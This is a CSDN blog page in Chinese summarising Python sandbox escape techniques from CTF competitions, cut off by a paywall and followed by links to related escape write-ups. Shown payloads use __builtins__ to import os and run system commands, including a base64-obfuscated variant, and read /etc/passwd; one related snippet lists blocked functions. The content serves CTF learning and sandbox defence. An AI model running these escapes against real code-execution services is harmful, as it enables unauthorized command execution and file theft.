Python沙箱逃逸总结

最新推荐文章于 2024-06-26 14:44:05 发布
最新推荐文章于 2024-06-26 14:44:05 发布
阅读量2k 收藏 9
点赞数
分类专栏: Python 文章标签: python 逃逸
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/calmegm/article/details/97390756
版权
本文详细介绍了Python沙箱逃逸的各种方法,包括利用__builtins__的__import__、file、open、eval等函数,通过object的__base__、__bases__、__mro__属性构造payload,以及借助__globals__和func_globals属性进行命令执行。同时,文章还提到了其他绕过限制的策略,如getattribute、decode拼接、无[]法、request法和各种盲注技巧,并提供了相关参考资料。
摘要由CSDN通过智能技术生成

0x00 简介

关于Python沙箱的逃逸,在多次CTF比赛中看到后,终于下定决心来进行一番学习和总结。

python沙箱逃逸:从一个受限制的python执行环境中获取到更高的权限,甚至getshell。

 

0x01 __builtins__

首先我们从python的内建函数__builtins__说起。通过dir(__builtins__)可以查看内置函数,展示所有内置类型和函数。

我们先来看最基础的__import__函数

# 直接调用

__builtins__.__import__('os').system('dir')

# 通过dict访问

__builtins__.__dict__[‘import__('os')’].system('ls')

 

# 玩一些花样-转码

__builtins__.__dict__['X19pbXBvcnRfXw=='.decode('base64')]('b3M='.decode('base64')).system('ls')

此外还有file、open、eval等函数

__builtins__.__dict__.__getitem__('file')('/etc/passwd').read()
__builtins__.__dict__.__getitem
最低0.47元/天 解锁文章
6um1n
关注
专栏目录
python沙箱逃逸小结
Assassin
11-11 8610
之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下 首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性1.内联函数python的内敛函数真是强大,可以调用一切函数做自己想做的事情 我们输入dir('builtins')发现如下 我们在python的object类中集成了很多的基础函数,我们想要调用的时
Python Jail 沙盒逃逸 合集
Jay17的博客
08-22 4274
Python Jail 沙盒逃逸 合集
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境中运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
深入浅出Python沙箱越狱:原理、方法与防范
最新发布
公众号:该用户快成仙了
06-26 1045
通过本文,我们了解了Python沙箱的概念、工作原理,以及各种沙箱越狱的技术。这些知识不仅能帮助我们更好地理解Python的安全机制,也能让我们在设计和实现安全系统时更加谨慎。作者:大鲸鱼crush链接:https://juejin.cn/post/7383982728734425125。
python沙箱逃逸总结
weixin_44576725的博客
04-14 3928
python沙箱逃逸总结 让用户提交 Python 代码并在服务器上执行,是一些 OJ、量化网站重要的服务,很多 CTF 也有类似的题。为了不让恶意用户执行任意的 Python 代码,就需要确保 Python 运行在沙箱中。沙箱经常会禁用一些敏感的函数,例如 os,研究怎么逃逸、防护这类沙箱还是蛮有意思的。 前言 Python沙箱逃逸的最终目标就是执行系统任意命令,次一点的写文件,再次一点的读文件。 顺便安利一本书:《流畅的 Python》。这本书有很多中高阶知识点,很全面而且讲的很清楚,如果你看过,相
Python沙箱逃逸终极指南:安全漏洞分析和解决方案一网打尽
Rocky006的博客
01-16 1675
Python 是一种强大而灵活的编程语言,但在某些情况下,可能需要运行不受信任的代码,同时又希望限制它的行为,以防止对系统的不良影响。这时,Python 沙箱就成为一种有用的工具,它可以帮助你在安全的环境中运行不受信任的代码。本文将探讨 Python 沙箱的概念、常见的沙箱技术以及如何避免沙箱逃逸
python安全学习笔记-沙箱逃逸
人饭子的博客
11-01 464
沙箱逃逸 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 相关文章 初探Python沙箱逃逸 IS-pwn-escape-python沙箱逃逸 Python 沙盒 Python 沙箱逃逸的经验总结 什么是沙箱逃逸 沙箱逃逸,就是在给我们的一个代码执行环境下,脱离种种过滤和限制,最终拿到 shell。 python如何执行...
python沙箱逃逸
夏日 の blog
02-06 1555
说明:本篇文章适合这方面的小白的入门,结合我的另一篇文章https://blog.csdn.net/zss192/article/details/104199520更容易理解 一些常见的寻找特殊模块的方式 __class__:获得当前对象的类 __bases__:列出其基类 __mro__ :列出解析方法的调用顺序,类似于bases __subclasses__():返回子类列表 __dict...
沙箱逃逸技术总结
09-11
沙箱逃逸技术总结
Python沙箱逃逸
qq_36511916的博客
12-29 514
案例1 def make_secure(): UNSAFE = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'e...
python沙盒逃逸
Lethe's Blog
08-13 2273
0x01 简单介绍 python沙盒逃逸就是通过绕过种种过滤和限制,拿到本不应获取的一些“危险函数",或者绕过Python终端达到命令执行的效果。 0x02 常用备忘录 (1)func_globals 用法:function.func_globals 作用:返回包含函数全局变量的字典的引用——定义函数的模块的全局命名空间。 >>> def test():pass ... &gt...
沙箱逃逸-通过题解了解沙箱逃逸
qq_56815564的博客
05-31 1837
这个系列的最后一题,给了个窗口,先按照提示输入对应的字符看看:G是表明了黑名单,这里不能执行import,不能定义函数,不能使用lambda表达式,可以的就是能执行多行代码。这个时候想到类的定义把带有@的函数放到某个函数的定义处,相当于执行了一次@后的函数后面这个是一个类定义,这里的pass的主要作用就是占据位置,让代码整体完整,定义一个空类会报错尝试执行:进入main函数主体,这个时候就可以通过使用一句话RCE来获取shell了这个系列就结束了,个人觉得还是挺面向新手的,一步一步来吧。
php 沙箱逃逸,Python沙箱逃逸之基础篇
weixin_42299244的博客
03-28 329
0x01 前言周末去参加了一波国赛的半决赛,发现全部都是python的题,之前还以为会有人把模版改成php的呢,结果都没有。。对于python也不是很熟悉,所以回来之后学习一下。0x02 Python一般的利用方式一般python沙箱的话都是可以执行python命令的一个环境,因此我们需要知道一些敏感的函数来帮助我们getshell或者读取敏感文件等等执行系统命令12345os.system('w...
HackTheBox UpDown python沙箱逃逸获得用户shell,sudo提权
Ba1_Ma0的博客
11-10 2178
但是服务器禁用了一些函数,我们不能使用system()、passthru()、shell_exec()、popen()、fsockopen() 等,简单的 PHP 反向 shell用不了,但是proc_open()没有被禁用,我们可以利用这个函数来获取用户shell。根据我们刚刚的分析,我们可以创建一个.phar文件,里面放上很多网站的网址,在文件末尾放上php代码,当checker.php忙于检查站点时,我们访问上传的文件执行代码。这个网站对我们上传的文件扩展名进行了检查,不允许任何.php文件。
各种姿势解析-python沙箱逃逸
qq_43390703的博客
09-07 2531
目录1.预备内容python中内置执行系统命令的模块:subprocessoscommandstimeitpaltformpty可执行系统命令的函数两个魔术方法python中可以执行任意代码的函数导入os或sys的库2. 沙箱逃逸花式import花式处理字符串恢复sys.modules花式执行函数通过继承关系逃逸文件读写其他3.小结/思路4.实例1. ISCC 2016 Pwn300 pycalc2.__ future _3.hackuctf 20124.future5.cuit2017payload集锦5
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值